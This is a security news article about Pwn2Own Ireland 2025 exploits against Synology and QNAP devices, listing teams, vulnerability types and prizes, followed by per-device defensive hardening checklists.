Pwn2Own Ireland 2025: Synology and QNAP Devices Hacked for Over $335,000

The Pwn2Own Ireland 2025 competition has concluded, sending a clear message to the network-attached storage (NAS) market. Security researchers successfully exploited multiple Synology and QNAP devices, collectively earning more than $350,000 in prize money. The event underscores that even trusted storage platforms are not immune to sophisticated attacks and highlights the importance of keeping systems fully patched.

Pwn2Own is one of the world’s most recognized hacking contests, where top security researchers are invited to uncover and demonstrate previously unknown vulnerabilities (“zero-days”) in widely used hardware and software. Participating vendors, including Synology and QNAP, supply their products as live targets. Successful exploitation earns cash rewards and Master of Pwn points, while vulnerabilities are privately disclosed to vendors to allow coordinated patching. This process strengthens the cybersecurity ecosystem by closing dangerous gaps before criminals can exploit them.

QNAP Devices: The Most Targeted Hardware at Pwn2Own Ireland 2025

QNAP systems were the most frequently targeted throughout the three-day event, appearing in more than half a dozen successful or partial exploits and earning researchers around $190,000 in total prizes.

$100,000 for a “SOHO Smashup”
Team DDOS achieved one of the contest’s largest payouts by chaining eight distinct vulnerabilities to compromise both a QNAP Qhora-322 router and a QNAP TS-453E NAS. The “SOHO Smashup” category illustrates how a real-world attacker could pivot from a compromised router into the internal network, reaching NAS systems and other assets.

$40,000 for Multiple Injections
The DEVCORE Research Team and DEVCORE Intern Program exploited the QNAP TS-453E using multiple code injections and a format string flaw, successfully gaining full control of the device.

$20,000 for a Single Code Injection
On Day Two, Chumy Tsai of CyCraft Technology exploited the same TS-453E model using a single code injection vulnerability, earning a unique-bug reward.

$20,000 for Hard-Coded Credentials and Injection
On Day Three, Sina Kheirkhah of the Summoning Team used hard-coded credentials combined with an injection flaw to seize control of the QNAP TS-453E. Hard-coded accounts remain one of the most dangerous weaknesses, allowing attackers to bypass authentication entirely.

$10,000 Collision Awards and Failures
Several teams, including PHP Hooligans, Evan Grant, and Team DDOS, received reduced collision prizes for reusing vulnerabilities already demonstrated in earlier rounds. Another attempt by Fuzzinglabs failed to execute within the contest timeframe, showing how competitive and technically demanding the environment has become.

Taken together, these results confirm that the QNAP TS-453E was one of the most analyzed and compromised devices of the entire event, with unique, collision, and failed attempts recorded across all three days.

Synology Devices: Multiple Product Lines Compromised

Synology hardware was also a central focus, yielding at least $165,000 in confirmed payouts and a diverse range of bug types spanning routers, cameras, and appliances.

$50,000 for Dual Exploits on ActiveProtect DP320
The Summoning Team leveraged two unique vulnerabilities to achieve remote code execution on the Synology ActiveProtect Appliance DP320, the highest-value Synology exploit of the contest.

$40,000 for DiskStation DS925+ Remote Code Execution
Researcher Sina Kheirkhah (Summoning Team) used two bugs to gain full code execution on the Synology DS925+.
Separately, Verichains Cyber Force combined an authentication bypass with another unique flaw to obtain root access on the same model, earning $20,000.

$40,000 for Stack Overflow in BeeStation Plus
The Synacktiv Team achieved root-level code execution on the Synology BeeStation Plus via a stack-based buffer overflow.

$15,000 for Known Bug in CC400W Camera
The Summoning Team also exploited the Synology CC400W camera, but since the vulnerability was already known to Synology, the entry was marked a collision with a reduced payout.

Across all attempts, Synology devices exhibited a mix of unique zero-days, known but unpatched flaws, and out-of-scope exploits, covering multiple product categories from home routers and NAS units to surveillance appliances.

 How to secure and prevent these attacks?

Below I list practical, targeted measures that could have prevented each successful or partial exploit from Pwn2Own Ireland 2025. I keep the advice specific to the reported bug type or attack chain so you can apply the right controls to the right failure mode.

Treat any device that appears in the list as high priority to monitor and to patch as soon as vendor updates are released.

1 Synology BeeStation Plus, stack based buffer overflow, root code execution
Immediate actions while patch is pending

1. Isolate the device, place it on a dedicated management or camera VLAN with no route to your main storage or workstation VLANs.

2. Remove any internet exposure, block incoming ports and block outbound connections from the device at your firewall.

3. Disable remote management, remote streaming features, and any unnecessary services in the camera settings.

4. Restrict accounts, change default passwords, create a unique admin account and disable or remove default or unused accounts.

5. Enable tight monitoring, forward logs to your SIEM or a log collector, alert on unusual outbound traffic or unexpected process behavior.

6. If the device is critical and cannot be isolated, consider temporary replacement until a vendor fix arrives.

2 Synology DiskStation DS925+, two chained bugs causing code execution
Immediate actions while patch is pending

1. Remove internet exposure for DSM, block ports used by DSM and management on your perimeter firewall.

2. Require VPN for any remote access to DSM, do not allow direct remote logins.

3. Turn off unused packages and services, especially community or third party packages that expose web APIs.

4. Enable MFA on all admin and privileged accounts, rotate admin passwords immediately.

5. Snapshot configuration and important data, preserve logs and evidence in case of suspicious activity.

6. Increase logging and alert thresholds for privilege escalation or new admin account creation.

3 Synology ActiveProtect DP320, dual bugs leading to RCE
Immediate actions while patch is pending

1. Move the appliance to a management VLAN that only a small set of admin machines can reach.

2. Block its internet egress except to vendor update servers if needed, prevent arbitrary outbound connections.

3. Disable remote web based management, only allow admin access through an internal jump host or VPN.

4. Enforce unique credentials and enable MFA for appliance admin accounts.

5. Monitor for any unexpected scanning or outbound C2 indicators from the appliance.

4 QNAP Qhora-322 router and TS-453E SOHO Smashup, chain of eight bugs, multiple injections
Immediate actions while patch is pending

1. Disable remote router administration and UPnP on the router now, restrict any router admin access to a management VPN only.

2. Create strict network segmentation, place router management, IoT and NAS on separate VLANs and deny inter VLAN traffic except where explicitly required.

3. Block common management ports between VLANs, prevent router management from accessing NAS admin ports.

4. Apply latest firmware to router and NAS if available, even if unrelated, and reboot devices to close transient memory state.

5. Monitor cross VLAN traffic for lateral movement, alert on unusual router to NAS connections.

5 QNAP TS-453E, multiple injections plus format string bug
Immediate actions while patch is pending

1. Disable or remove web facing third party apps, reduce the number of web interfaces exposed.

2. Restrict management access to LAN or VPN only, block public access at the perimeter.

3. Run QNAP Security Advisor and fix high and critical findings immediately.

4. Use a reverse proxy with basic filtering rules, or a network WAF appliance if available, to block obvious injection patterns.

5. Increase logging of web request payloads and monitor for suspicious format string like payloads.

6 QNAP TS-453E, single code injection bug (Chumy Tsai)
Immediate actions while patch is pending

1. Close expose points, block external access to the NAS web interface, require VPN for remote admin.

2. Audit installed applications and remove anything that accepts free form input or runs user supplied code.

3. Enable least privilege for services, avoid running web facing services as root.

4. Deploy simple WAF rules or reverse proxy filters to drop common injection payload signatures.

5. Monitor for unexpected new files, web shells, or processes spawned by web apps.

7 Synology DS925+, auth bypass plus secondary bug producing root RCE (Verichains)
Immediate actions while patch is pending

1. Enforce multi factor authentication for all admin and privileged accounts immediately.

2. Rotate admin passwords and disable unused admin accounts.

3. Require management via VPN or internal jump host only, block direct internet access to DSM.

4. Harden session settings, reduce session lifetimes and increase session validation logging.

5. Watch for unusual login sources, repeated token refreshes, and any elevation of privilege events.

8 Synology CC400W camera, known bug collision, partial success
Immediate actions while patch is pending

1. Inventory every CC400W and log firmware versions. Treat those devices as high priority.

2. If a patch is not available, isolate the camera on a VLAN with no access to NAS or management networks.

3. Disable any remote streaming or cloud features, change default passwords and set unique credentials.

4. Consider temporary device replacement or removal from the network if isolation is not possible.

5. Monitor camera outbound connections, block any unexpected external endpoints.

9 QNAP TS-453E, previously seen bug collision (PHP Hooligans and others)
Immediate actions while patch is pending

1. Run vulnerability scanning against your fleet to identify affected versions and services.

2. Block access to the vulnerable service at the network level until a vendor fix is installed.

3. Apply mitigation workarounds provided by vendor or CERT notices, for example disabling a specific service or feature.

4. Increase monitoring on ports and services associated with the CVE and alert on exploit like behavior.

10 QNAP TS-453E, hard coded credentials plus injection (Sina Kheirkhah)
Immediate actions while patch is pending

1. Inspect for default or shared credentials across all devices, and change any that are default immediately.

2. On devices that force no change of baked in credentials, isolate them from all but necessary management hosts.

3. If the vendor confirms an embedded credential, treat the device as high risk and consider replacement or strict isolation until fixed.

4. Add network controls to block use of known hard coded account names and log any authentication attempts for those accounts.

11 QNAP TS-453E, reused bug collision (Evan Grant)
Immediate actions while patch is pending

1. Confirm the device is patched to the latest available QTS baseline, if vendor guidance recommends temporary mitigations apply them.

2. Block external access to the vulnerable endpoint until you can apply the vendor patch.

3. Perform forensic checks for signs of prior exploitation such as new admin users, modified binaries, or unexpected scheduled jobs.

12 QNAP TS-453E, reused bug collision (Team DDOS later entry)
Immediate actions while patch is pending

1. Implement a rapid patch and verification process so when the vendor releases a fix you can apply and verify immediately.

2. Where possible automate patch deployment for critical devices, or schedule emergency maintenance windows.

3. Temporarily harden default configs, for example restrict services, enable firewall rules, and require stronger authentication.

13 QNAP TS-453E, failed attempt (Fuzzinglabs)
Immediate actions while patch is pending

1. Keep exploit mitigation settings enabled on the NAS, do not disable protections for convenience.

2. Ensure alerting and logging are functioning and review any failed attempts to understand attack patterns.

3. Continue routine hardening tasks, such as removing unused apps and enforcing least privilege, so future attempts are more likely to fail.

The Broader Lesson for NAS Users

For NAS owners, the key lesson from Pwn2Own 2025 is clear: no system is invulnerable, even from established brands with strong security reputations.
Every NAS administrator should take these findings as an urgent call to action.

Essential Practices for NAS Security

• Remove exposure, keep management interfaces off the internet, use VPN only for remote management.
• Enforce strong unique credentials and enable multi factor authentication for admin users.
• Apply vendor updates and security patches promptly, subscribe to vendor advisory feeds.
• Segment device types onto separate VLANs and use strict firewall rules between segments.
• Use least privilege and privilege separation for device processes and services, avoid running services as root.
• Adopt secure development practices, including static analysis, fuzzing, sanitizer usage and code review focused on memory safety and injection resilience.
• Employ runtime exploit mitigations, for example ASLR, stack canaries, non executable memory and control flow integrity where supported.
• Monitor devices with logs and anomaly detection, alert on unusual login patterns, large data transfers or unexpected outgoing connections.
• Remove or replace devices that ship with hard coded secrets or that lack vendor patch support.

Final Thoughts

Pwn2Own Ireland 2025 showcased the critical role of ethical hackers in hardening modern NAS ecosystems. Synology and QNAP, both event co-sponsors, are expected to coordinate with Trend Micro’s Zero Day Initiative to release timely patches.
While the vulnerabilities revealed may sound alarming, the coordinated disclosure model ensures they will be addressed before mass exploitation occurs.

For end users and IT administrators, vigilance, prompt patching, and careful configuration remain the strongest defense against evolving NAS security threats.

Complete List of Synology and QNAP Appearances at Pwn2Own Ireland 2025

Would

Where to Buy a Product
			VISIT RETAILER ➤
			VISIT RETAILER ➤
			VISIT RETAILER ➤
			VISIT RETAILER ➤

☕ WE LOVE COFFEE ☕

Or support us by using our affiliate links on Amazon UK and Amazon US